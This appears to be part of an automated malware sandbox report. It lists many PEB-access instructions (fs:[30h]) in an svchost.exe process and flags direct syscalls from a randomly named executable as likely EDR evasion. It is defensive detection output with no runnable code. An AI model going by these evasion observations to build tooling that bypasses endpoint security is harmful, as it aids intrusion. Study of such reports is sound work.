            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]2_2_03A2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]2_2_03AF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]2_2_03AF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]2_2_03AF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]2_2_03AF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]2_2_03AB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB106E mov eax, dword ptr fs:[00000030h]2_2_03AB106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05060 mov eax, dword ptr fs:[00000030h]2_2_03B05060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov ecx, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]2_2_03A5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD070 mov ecx, dword ptr fs:[00000030h]2_2_03AAD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]2_2_03A32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD705E mov ebx, dword ptr fs:[00000030h]2_2_03AD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD705E mov eax, dword ptr fs:[00000030h]2_2_03AD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B052 mov eax, dword ptr fs:[00000030h]2_2_03A5B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]2_2_03AB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB97A9 mov eax, dword ptr fs:[00000030h]2_2_03AB97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]2_2_03ABF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]2_2_03ABF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]2_2_03ABF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]2_2_03ABF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]2_2_03ABF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B037B6 mov eax, dword ptr fs:[00000030h]2_2_03B037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]2_2_03A307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5D7B0 mov eax, dword ptr fs:[00000030h]2_2_03A5D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF78A mov eax, dword ptr fs:[00000030h]2_2_03AEF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3D7E0 mov ecx, dword ptr fs:[00000030h]2_2_03A3D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A357C0 mov eax, dword ptr fs:[00000030h]2_2_03A357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A357C0 mov eax, dword ptr fs:[00000030h]2_2_03A357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A357C0 mov eax, dword ptr fs:[00000030h]2_2_03A357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]2_2_03AB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF72E mov eax, dword ptr fs:[00000030h]2_2_03AEF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A33720 mov eax, dword ptr fs:[00000030h]2_2_03A33720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4F720 mov eax, dword ptr fs:[00000030h]2_2_03A4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4F720 mov eax, dword ptr fs:[00000030h]2_2_03A4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4F720 mov eax, dword ptr fs:[00000030h]2_2_03A4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF972B mov eax, dword ptr fs:[00000030h]2_2_03AF972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]2_2_03B0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]2_2_03B0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]2_2_03B0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]2_2_03B0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29730 mov eax, dword ptr fs:[00000030h]2_2_03A29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29730 mov eax, dword ptr fs:[00000030h]2_2_03A29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A65734 mov eax, dword ptr fs:[00000030h]2_2_03A65734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3973A mov eax, dword ptr fs:[00000030h]2_2_03A3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3973A mov eax, dword ptr fs:[00000030h]2_2_03A3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]2_2_03AAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37703 mov eax, dword ptr fs:[00000030h]2_2_03A37703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A35702 mov eax, dword ptr fs:[00000030h]2_2_03A35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A35702 mov eax, dword ptr fs:[00000030h]2_2_03A35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]2_2_03A6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]2_2_03A30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]2_2_03A60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6F71F mov eax, dword ptr fs:[00000030h]2_2_03A6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6F71F mov eax, dword ptr fs:[00000030h]2_2_03A6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]2_2_03A2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]2_2_03A2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]2_2_03A2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]2_2_03A2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]2_2_03A38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43740 mov eax, dword ptr fs:[00000030h]2_2_03A43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43740 mov eax, dword ptr fs:[00000030h]2_2_03A43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43740 mov eax, dword ptr fs:[00000030h]2_2_03A43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]2_2_03A30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B03749 mov eax, dword ptr fs:[00000030h]2_2_03B03749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]2_2_03AB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03A6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D6AA mov eax, dword ptr fs:[00000030h]2_2_03A2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D6AA mov eax, dword ptr fs:[00000030h]2_2_03A2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A276B2 mov eax, dword ptr fs:[00000030h]2_2_03A276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A276B2 mov eax, dword ptr fs:[00000030h]2_2_03A276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A276B2 mov eax, dword ptr fs:[00000030h]2_2_03A276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]2_2_03A666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]2_2_03AB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]2_2_03AB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]2_2_03AB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]2_2_03AB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]2_2_03A5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]2_2_03A5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A636EF mov eax, dword ptr fs:[00000030h]2_2_03A636EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AED6F0 mov eax, dword ptr fs:[00000030h]2_2_03AED6F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]2_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]2_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]2_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]2_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF6C7 mov eax, dword ptr fs:[00000030h]2_2_03AEF6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A616CF mov eax, dword ptr fs:[00000030h]2_2_03A616CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]2_2_03A66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05636 mov eax, dword ptr fs:[00000030h]2_2_03B05636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]2_2_03A68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]2_2_03A3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A61607 mov eax, dword ptr fs:[00000030h]2_2_03A61607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]2_2_03AAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6F603 mov eax, dword ptr fs:[00000030h]2_2_03A6F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
